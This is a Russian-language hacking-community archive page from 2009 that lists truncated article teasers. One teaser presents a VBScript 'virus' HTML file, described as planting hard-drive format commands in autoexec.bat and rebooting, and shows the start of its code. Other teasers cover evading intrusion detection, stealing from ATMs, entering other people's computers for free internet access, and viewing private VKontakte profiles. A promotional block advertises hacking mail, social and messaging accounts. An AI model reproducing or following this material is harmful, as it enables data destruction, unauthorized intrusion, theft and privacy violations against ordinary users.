Суббота, 27.04.2024, 01:54
Приветствую Вас Гость | RSS
xakers"
Главная | Регистрация | Вход
Меню сайта
Мини-чат
Наш опрос
Оцените мой сайт
Всего ответов: 55
Главная » Архив материалов

Часто люди путаются между понятиями Spam и Mail-bomb. Spam - отправление на почтовый ящик огромного колличества сообщения (разбираются случае, когда отправить умышленно хочет наввредить человеку). Например: человек отправляет на почтовый ящик своего знакомого 5000 писем, при этом он его не "бомбит", а "спамит". Реально же почтовая бомба - это вредоносный скрипт, либо что-то другое, способное нанести вред информации, компьютеру и тд. Часто для написания вредоносных скриптов и почтовых червей используют Visual Basic Script. 
Далее следует пример скрипта, который прописывает в autoexec.bat строчки для беззапросного форматирования винчестера и выключает компьютер. Создайте файл virus.html и внесите в него код скрипта: 

<html>
<body>
<script language ="VBScript">
sub Reboot 'Процедурка перезагрузки
Set Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe User.exe,ExitWindows" 'Вызов WinApi с помощью < ... Читать дальше »

Просмотров: 509 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Предисловие переводчика: небольшое введение к оригинальной статье было удалено, т.к. оно не относилось к делу. В нем описывалось как к Фреду пришла идея написать этот материал. Я его пропустил. Единственное, что надо добавить, - автор предупреждает, что к этому материалу надо относиться одновременно и серьезно и с определенной долей иронии. Многие пути применимы только для ОС Unix. 
Вставка посторонних символов в атаку, что обычно приводит к невозможности ее обнаружения. (Примечание переводчика - это касается систем обнаружения злоупотреблений, которые используют сигнатуры атак). 
Использование табуляций вместо пробелов в командах. Такое изменение разделителя может также привести к невозможности обнаружения атаки. 
Очень близкий путь к п.2. Вы могли бы изменить символ разделителя в системе (например, на %), что приведет к определенным проблемам с системами обнаружения атак. 
Измените стандартную последовательность действий при атаке. Например, если атака одинаково осущес ... Читать дальше »

Просмотров: 381 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Банковские автоматы и кредитные карточки уже давно появились на улицах больших городов и постепенно начинают входить в нашу жизнь. Что есть банкомат с точки зрения хакера? Правильно, источник халявы и быстрого способа заработать немного карманных деньжат. Ведь если украсть десяток--другой долларов, кто будет вас искать?

От банковских работников я слышал, что оправданными с финансовой точки зрения будут поиски похитителя, умыкнувшего в свой карман по крайней мере 300 вечнозеленых.

Уменьшим эту цифру вдвое для безопасности и примем полученные полтораста баксов в качестве того потолка, заходить за который не стоит даже в том случае, если очень--очень хочется купить новый микропроцессор или материнскую плату, а к ним быстрый модем впридачу.

Впрочем, с юридической точки зрения похищение даже одного доллара - кража. Поэтому, прежде чем отправляться к ближайшему банкомату с кусачками и отверткой, запаситесь на всякий случай парой адвокатов и захватите Шварценеггера на ... Читать дальше »

Просмотров: 928 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

тебя научу как-раз заходить на чужие компы - сидеть в интернете на чужой счёт (Халява). Обьясняю принцип : Когда ты выходишь в Интернет, то ты входишь в сеть (т.е. имеется возможность заходить на другие компы!). Приготовления : Зайди в "Мой компьтер" --> "Панель Управления" --> "Сеть". Должны быть установлены следущие компоненты : Клиент для сетей Microsoft Контроллер удаленного доступа NetBEUI TCP/IP Наверняка у тебя нет "Клинта для сетей Microsoft" и "NetBEUI". Клиент : Кнопка "Добавить" --> "". В отрывшем окне выбери "клиент", справа - "Клиент для сетей Microsoft". NetBEUI : Кнопка "Добавить" --> "". В отрывшем окне выбери "Протокол". В отрывшем окне выбери "Microsoft", - "NETBEUI". Всё,Нажми "ОК", перезагрузись .
Дальше мы настроем свойства соединения :
Зайди в "Мой компьютер" --> "Удаленный доступ к сети".
Выбери своё соединение, вызови "Свойства".
На Вкладке "Тип сервера" должны быть галочки на :

Войти в сеть 
Программное сжатие данных 
... Читать дальше »

Просмотров: 342 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Взлом ВКонтакте (vkontakte.ru взлом)

Хотите взломать пользователя ВКонтакте.ру? Или хотите узнать, как можно взломать Vkontakte? Или просто взлом ВКонтакте?

А возможно Вы сами взломали ВКонтакте.ру? :Ы)

В любом случае, этот пункт данной статье освещает вовсе не взлом контакта :) А вполне более мирную штуку – использование небольших уязвимостей.


Итак, ВКонтакте, как и на любом другом сайте, существуют небольшие не-технические уязвимости. Просчёты мозга. Ну не всё же человек может просчитать. Тут нам поможет социальная инженерия – поиск доступа к информации или системам хранения информации без использования технических средств. К счастью, всё уже найдено и без Вас, поэтому Вам можно лишь использовать плоды чужих трудов.

Далее будут приведены адреса, с помощью которых можно просмотреть фотографии, видео, аудио и заметки человека, имеющего закрытый профиль. Эти адреса нужно будет скопировать в адресную ... Читать дальше »

Просмотров: 389 | Добавил: xakerd | Дата: 17.02.2009 | Комментарии (1)

 ВКонтакте.ру – самый посещаемый сайт Рунета по версии Alexa Rank. ВКонтакте.ру – самая популярная социальная сеть России и стран СНГ. Миллионы людей ежедневно заходят “в Контакт”…

Тут я сначала написал массивное вступление: про историю сайта vkontakte, про facebook, про API для разработчиков… но всё стёр и оставил главное в посте… приложения и веб-сервисы, упрощающие работу с самой большой социалкой России – ВКонтакте.ру (vkontakte.ru):

Просмотров: 374 | Добавил: xakerd | Дата: 17.02.2009 | Комментарии (0)


Наш проект является сообществом людей, которые увлекаются взломом, поиском уязвимостей, кодингом и т.д.
У нас вы можете получить море полезной информации, к примеру по вопросам :
Взлом, Взломать, Взлом паролей, взлом icq аськи, взлом почты, взлом сайта форума, взлом ящика mail ru, взлом ящика rambler ru, взлом ящика yandex ru, взлом ящика gmail ru, взлом проги, взлом rar архива, взлои игр, взлои сети, взломать пароль, взлои аккаунта, взлои одноклассники, взлом odnoklassniki.ru, взлом вконтакте, взлом vkontakte.ru, взлом moskva ru, как стать хакером, хакер, xakep, sql injection и т.д, это самые частые вопросы.
Будте с нами :)

Просмотров: 378 | Добавил: xakerd | Дата: 17.02.2009 | Комментарии (0)

« 1 2 3 4
Форма входа
Календарь новостей
«  Апрель 2024  »
ПнВтСрЧтПтСбВс
1234567
891011121314
15161718192021
22232425262728
2930
Поиск
Друзья сайта
Статистика

Copyright MyCorp © 2024

Бесплатный хостинг uCoz